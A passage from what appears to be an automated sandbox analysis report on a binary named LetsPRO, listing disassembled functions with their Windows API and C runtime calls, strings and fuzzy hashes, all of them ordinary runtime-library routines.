                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__fassign__invoke_watson__timezone__tzname_get_daylight_get_dstbias_get_timezone_lock_malloc_crtatolstrcmpstrcpy_sstrncpy_s
                                        • String ID:
                                        • API String ID: 3174396702-0
                                        • Opcode ID: 175b3a8a0f7a5b23cea234ca01cc71a5ce9f71817720ef80b26ea28134160a3d
                                        • Instruction ID: 6d98bdcf5916807d1d1590adcbb3efa4bb01fe654adab3646a1c5e3d326ca2a7
                                        • Opcode Fuzzy Hash: 175b3a8a0f7a5b23cea234ca01cc71a5ce9f71817720ef80b26ea28134160a3d
                                        • Instruction Fuzzy Hash: 7491F672E1C248AFDB009FA9D8819DDBBF9EF2A318B35002AD494E7E54D734C846CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90BA64 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 110libraryloadermemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BA6C
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6C90BA89
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6C90BA96
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6C90BAA3
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6C90BAB0
                                        • TlsAlloc.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BAEC
                                        • TlsSetValue.KERNEL32(00000000,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB07
                                        • __init_pointers.LIBCMT ref: 6C90BB11
                                          • Part of subcall function 6C90BA31: _encoded_null.MSVCR100(7591DFB0,6C90BB16,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BA34
                                          • Part of subcall function 6C90BA31: __initp_misc_winsig.LIBCMT ref: 6C90BA54
                                        • EncodePointer.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB22
                                        • EncodePointer.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB2F
                                        • EncodePointer.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB3C
                                        • EncodePointer.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB49
                                        • DecodePointer.KERNEL32(?,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB6A
                                        • _calloc_crt.MSVCR100(00000001,00000214,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB7F
                                        • DecodePointer.KERNEL32(00000000,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB99
                                        • _initptd.MSVCR100(00000000,00000000,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BBA4
                                          • Part of subcall function 6C901ECB: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C901F68,00000008,6C927629,00000000,00000000), ref: 6C901EDC
                                          • Part of subcall function 6C901ECB: _lock.MSVCR100(0000000D), ref: 6C901F10
                                          • Part of subcall function 6C901ECB: InterlockedIncrement.KERNEL32(?), ref: 6C901F1D
                                          • Part of subcall function 6C901ECB: _lock.MSVCR100(0000000C), ref: 6C901F31
                                        • GetCurrentThreadId.KERNEL32 ref: 6C90BBAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressEncodeProc$DecodeHandleModule_lock$AllocCurrentIncrementInterlockedThreadValue__init_pointers__initp_misc_winsig_calloc_crt_encoded_null_initptd
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 3305441573-3819984048
                                        • Opcode ID: f79301eb3ba14f85607561614fcd6079c987a3c308b61a7d413381151fd52ce3
                                        • Instruction ID: a424199c42b4e5f5bec8217dc52f6c845a94d39ad846dfabbae82422c92d925c
                                        • Opcode Fuzzy Hash: f79301eb3ba14f85607561614fcd6079c987a3c308b61a7d413381151fd52ce3
                                        • Instruction Fuzzy Hash: 86315E71B096509FDF10AFF4BC04E0D3BFAAF96A59730152AE424D2A94EB78C405EF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9066EA Relevance: 34.8, APIs: 23, Instructions: 295COMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C8F12D7
                                        • free.MSVCR100(?), ref: 6C8F131B
                                        • _malloc_crt.MSVCR100(00000004), ref: 6C90672F
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • _calloc_crt.MSVCR100(00000180,00000002,00000004), ref: 6C90673F
                                        • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000002,00000004), ref: 6C90674A
                                        • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6C906755
                                        • _calloc_crt.MSVCR100(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6C906764
                                        • GetCPInfo.KERNEL32(?,?), ref: 6C9067B7
                                        • ___crtGetStringTypeA.LIBCMT ref: 6C9067FB
                                        • __crtLCMapStringA.MSVCR100(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6C90682E
                                        • __crtLCMapStringA.MSVCR100(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6C90685B
                                        • memcpy.MSVCR100(?,?,000000FE), ref: 6C9068B5
                                        • memcpy.MSVCR100(?,?,0000007F,?,?,000000FE), ref: 6C9068C4
                                        • memcpy.MSVCR100(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6C9068D6
                                        • free.MSVCR100(?), ref: 6C90692B
                                          • Part of subcall function 6C90017E: HeapFree.KERNEL32(00000000,00000000,?,6C927642,00000000), ref: 6C900194
                                        • free.MSVCR100(?,?), ref: 6C930ADD
                                        • free.MSVCR100(?,?,?), ref: 6C930AE5
                                        • free.MSVCR100(?,?,?,?), ref: 6C930AED
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$_calloc_crt$Stringmemcpy$__crt$DecrementFreeHeapInfoInterlockedType___crt_malloc_crtmalloc
                                        • String ID:
                                        • API String ID: 3303389740-0
                                        • Opcode ID: 483a79d31b1b904ec80ff72754208b5c49c5e86005e722a38dcdaf4a33ad7d80
                                        • Instruction ID: 409f706bc27e2b018cc688eb3cadd5572ddad8aaae20f7731afb1f2eb537ec42
                                        • Opcode Fuzzy Hash: 483a79d31b1b904ec80ff72754208b5c49c5e86005e722a38dcdaf4a33ad7d80
                                        • Instruction Fuzzy Hash: C8B17DB1E012459FDB10CFA9C880BEEBBF8BF19304F10456DE869A7A40D775D985CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9121D3 Relevance: 34.7, APIs: 23, Instructions: 213COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcsnlen.MSVCR100(?,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C9121FD
                                        • wcsnlen.MSVCR100(?,00007FFF,?,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C912208
                                        • _calloc_crt.MSVCR100(00000002,00000002), ref: 6C912227
                                        • wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6C91223E
                                        • wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6C91225B
                                          • Part of subcall function 6C911F9A: wcschr.MSVCR100(00000000,0000003D,7591DF80,00000000,021F17E8), ref: 6C911FC5
                                          • Part of subcall function 6C911F9A: free.MSVCR100(?,7591DF80,00000000,021F17E8), ref: 6C912038
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C912299
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9122B5
                                        • _calloc_crt.MSVCR100(00000000,00000001), ref: 6C9122C2
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9122DB
                                        • _strlen.LIBCMT(00000000), ref: 6C9122ED
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C91230B
                                        • _errno.MSVCR100 ref: 6C912330
                                        • _errno.MSVCR100(?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C93103E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C931049
                                        • wcschr.MSVCR100(?,0000003D,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C931059
                                        • wcsnlen.MSVCR100(-00000002,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C93107D
                                        • _wcslen.LIBCMT(?,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C931089
                                        • _calloc_crt.MSVCR100(00000001,00000002,?,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C931094
                                        • wcscpy_s.MSVCR100(00000000,00000001,?), ref: 6C9310AA
                                        • _errno.MSVCR100(?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C9310B7
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C9310C2
                                        • free.MSVCR100(00000000), ref: 6C9310DD
                                        • free.MSVCR100(?), ref: 6C9310FF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_calloc_crt_errnofreewcscpy_swcsnlen$_invalid_parameter_noinfowcschr$_strlen_wcslen
                                        • String ID:
                                        • API String ID: 928254730-0
                                        • Opcode ID: 6accdf45689de75eca33cb8702b87bccca2540fa238bf9f7cb4534f301686aa1
                                        • Instruction ID: 38c9ddf5421dabb16c004dd741bd17e610e18ef5a2650227ff4f712f0e956c0f
                                        • Opcode Fuzzy Hash: 6accdf45689de75eca33cb8702b87bccca2540fa238bf9f7cb4534f301686aa1
                                        • Instruction Fuzzy Hash: 5E513B31A0A559FBCB155FA48C89DDF3A6CEF27B78F304119F02896E90DB35C641C6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C91858A Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                        • _FindAndUnlinkFrame.MSVCR100(?), ref: 6C9185A0
                                          • Part of subcall function 6C918411: _getptd.MSVCR100 ref: 6C918417
                                          • Part of subcall function 6C918411: _getptd.MSVCR100 ref: 6C91842B
                                        • _getptd.MSVCR100 ref: 6C9185B6
                                        • _getptd.MSVCR100 ref: 6C9185C5
                                        • _getptd.MSVCR100 ref: 6C9185D6
                                        • _getptd.MSVCR100 ref: 6C9185EA
                                        • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6C9185F8
                                          • Part of subcall function 6C9183EA: _getptd.MSVCR100 ref: 6C9183EF
                                        • _getptd.MSVCR100(00000001), ref: 6C918604
                                        • __DestructExceptionObject.MSVCR100(?,00000001), ref: 6C91860F
                                        • _getptd.MSVCR100 ref: 6C918616
                                        • _getptd.MSVCR100 ref: 6C918625
                                        • _getptd.MSVCR100 ref: 6C918636
                                        • _getptd.MSVCR100 ref: 6C918654
                                        • _getptd.MSVCR100 ref: 6C918662
                                        • _getptd.MSVCR100 ref: 6C92CA92
                                        • _getptd.MSVCR100 ref: 6C92CAAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                        • String ID: csm
                                        • API String ID: 473968603-1018135373
                                        • Opcode ID: 0b0a7cf99c80eaab02eea8b4df439e334946c750bc95c8a824b5b383d971068c
                                        • Instruction ID: fa6ae1b2c3c9326881fda23792b340854bcebd546911034292e716f64bcf33c8
                                        • Opcode Fuzzy Hash: 0b0a7cf99c80eaab02eea8b4df439e334946c750bc95c8a824b5b383d971068c
                                        • Instruction Fuzzy Hash: 07315E34608604CFC748AF15C485EE937A8AF2035AF8680BAD05D8BE62DF74D989DF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9524A7 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C9524BF
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9524CA
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C9524EF
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9524FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID: PATH
                                        • API String ID: 1328987296-1036084923
                                        • Opcode ID: a698ec538ef8fe9ee1ebb942320efa64292ff1382889b1f857aac2d28af01dc7
                                        • Instruction ID: 7382cd8fb956c8d5be5f90d57450394fa574614a70bfff4b13106724848556a5
                                        • Opcode Fuzzy Hash: a698ec538ef8fe9ee1ebb942320efa64292ff1382889b1f857aac2d28af01dc7
                                        • Instruction Fuzzy Hash: 3431E571A05E08EFDB11DF64CC485CD3B79BF61328F600296E824A7A95EF31C9948AA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9762DB Relevance: 30.3, APIs: 20, Instructions: 344COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • operator+.LIBCMT ref: 6C9762F6
                                          • Part of subcall function 6C975AB7: DName::DName.LIBCMT ref: 6C975ACA
                                          • Part of subcall function 6C975AB7: DName::operator+.LIBCMT ref: 6C975AD1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::Name::operator+operator+
                                        • String ID:
                                        • API String ID: 2937105810-0
                                        • Opcode ID: 0c8c894f6e191ff09b31c2115006440ef2c9ff85ddcb392f79009f02cb265a09
                                        • Instruction ID: d315ac9ea7891b5d70b01dbb8946a45fef2015068ff7bc5a0e5e5fa123d6f296
                                        • Opcode Fuzzy Hash: 0c8c894f6e191ff09b31c2115006440ef2c9ff85ddcb392f79009f02cb265a09
                                        • Instruction Fuzzy Hash: 1FD10E71A05209EFDF10CFA8C895AEDBBF8AF29318F504159E505E7B50DB34DA44CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911F9A Relevance: 30.2, APIs: 20, Instructions: 229COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCR100(00000000,0000003D,7591DF80,00000000,021F17E8), ref: 6C911FC5
                                        • free.MSVCR100(?,7591DF80,00000000,021F17E8), ref: 6C912038
                                        • _errno.MSVCR100(7591DF80,00000000,021F17E8), ref: 6C917490
                                        • _errno.MSVCR100(021F17E8), ref: 6C9314DB
                                        • _invalid_parameter_noinfo.MSVCR100(021F17E8), ref: 6C9314E6
                                        • ___mbtow_environ.LIBCMT ref: 6C931518
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$___mbtow_environ_invalid_parameter_noinfofreewcschr
                                        • String ID:
                                        • API String ID: 3080074160-0
                                        • Opcode ID: fb390af84a9099f9b8a1b5fc2967eb5028fc6d0227373b392a6c82f300d9b9b3
                                        • Instruction ID: 324914f34e6d398e2354b566dc67e6927706a2c97621191c1e11d2773e5cd29b
                                        • Opcode Fuzzy Hash: fb390af84a9099f9b8a1b5fc2967eb5028fc6d0227373b392a6c82f300d9b9b3
                                        • Instruction Fuzzy Hash: 0C711731708529DFCB128FA9D8815AC77B5EF27B1CB34255AD015C7EA0EB30CA81CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C916964 Relevance: 28.8, APIs: 19, Instructions: 273COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT(?,000000FF,00000024), ref: 6C91698D
                                        • _get_daylight.MSVCR100(?), ref: 6C9169C9
                                        • _get_dstbias.MSVCR100(?), ref: 6C9169DB
                                        • _get_timezone.MSVCR100(?), ref: 6C9169ED
                                        • _gmtime64_s.MSVCR100(?,?), ref: 6C916A21
                                        • _errno.MSVCR100 ref: 6C916A47
                                        • _gmtime64_s.MSVCR100(?,?), ref: 6C916A53
                                        • _errno.MSVCR100 ref: 6C929E31
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C929E3B
                                        • _errno.MSVCR100 ref: 6C929E47
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C929E51
                                        • _gmtime64_s.MSVCR100(?,?), ref: 6C929E8A
                                        • __allrem.LIBCMT ref: 6C929EF5
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929F11
                                        • __allrem.LIBCMT ref: 6C929F28
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C929F46
                                        • __allrem.LIBCMT ref: 6C929F5D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
                                        • String ID:
                                        • API String ID: 3568092448-0
                                        • Opcode ID: 4d2eb7793cc3ce4efd80a8c1d47d24142b7ca749c4dff488d69f6c85b95885fa
                                        • Instruction ID: 45ecf979659d62ec0eb365ee7430344d2ad2829b3fd467dc5d08b230af3936c1
                                        • Opcode Fuzzy Hash: 4d2eb7793cc3ce4efd80a8c1d47d24142b7ca749c4dff488d69f6c85b95885fa
                                        • Instruction Fuzzy Hash: BA81F472A457099BE715CF29CC81BAE73E9EF65328F29822AE451C7F80EB74D904C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90EA91 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 233COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DName::DName.LIBCMT ref: 6C92D3FA
                                        • DName::DName.LIBCMT ref: 6C92D42F
                                        • atol.MSVCR100(6C90EA8C,6C90EA8C,00000010,FFFF0000,00000000,00000000), ref: 6C92D4B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::$atol
                                        • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                        • API String ID: 2083219425-3945972591
                                        • Opcode ID: 99204b7a276a1802b047457816e4234e70677e076a46ce0cd65cff1af32a023c
                                        • Instruction ID: 5894df579975d3a926b4cbf26fa572b9c05bac0d0667f3a2eb137d97acbc3a39
                                        • Opcode Fuzzy Hash: 99204b7a276a1802b047457816e4234e70677e076a46ce0cd65cff1af32a023c
                                        • Instruction Fuzzy Hash: 2371CF72A151189ADB10DBA8CC80FEE777CBF26708F54005EE185A3B84EF78D648CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94A798 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 190threadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C9403CA: TlsGetValue.KERNEL32(6C9361E5), ref: 6C9403DC
                                        • TlsGetValue.KERNEL32 ref: 6C94A7C9
                                        • DebugBreak.KERNEL32 ref: 6C94A7D3
                                        • GetCurrentThreadId.KERNEL32 ref: 6C94A80B
                                        • swprintf.LIBCMT(?,00000400,[%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d),00000000), ref: 6C94A83B
                                        • _fwprintf.LIBCMT(?), ref: 6C94A87D
                                        • fflush.MSVCR100(?), ref: 6C94A888
                                        • OutputDebugStringW.KERNEL32(?), ref: 6C94A897
                                        • DebugBreak.KERNEL32 ref: 6C94A89D
                                        • exit.MSVCR100(000000F8), ref: 6C94A8A5
                                        Strings
                                        • [%d] %S: !!!!!!!Assert Failed(%S: %d), xrefs: 6C94A851
                                        • [%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d), xrefs: 6C94A8B0, 6C94A82A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Debug$BreakValue$CurrentOutputStringThread_fwprintfexitfflushswprintf
                                        • String ID: [%d:%d:%d:%d(%d)] %S: !!!!!!!Assert Failed(%S: %d)$[%d] %S: !!!!!!!Assert Failed(%S: %d)
                                        • API String ID: 1172176910-813932914
                                        • Opcode ID: 8c8641e66db0efdcc7fd9e253fd605622eb1328020f33ac883f23c40b6efe1ee
                                        • Instruction ID: 5f31a23a33d345ea7557dd8913a431228e940c382f353ead2b294f78e94f8167
                                        • Opcode Fuzzy Hash: 8c8641e66db0efdcc7fd9e253fd605622eb1328020f33ac883f23c40b6efe1ee
                                        • Instruction Fuzzy Hash: D9510AB2A0C3C49FDB12CBB49C589597FB8BF66204B1881EFE581C7592DB38C949CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93B9DA Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 111memorylibraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93B9E1
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000020,6C93B9AC,00000000,6C9A55E4,0000000C,6C9401F1,F3B6147F,?,?), ref: 6C93BA11
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?), ref: 6C93BA50
                                        • TlsAlloc.KERNEL32 ref: 6C93BA5A
                                        • GetLastError.KERNEL32 ref: 6C93BA68
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93BA80
                                        • _CxxThrowException.MSVCR100(6C90C83C,6C90C8D8,?,00000001), ref: 6C93BA8E
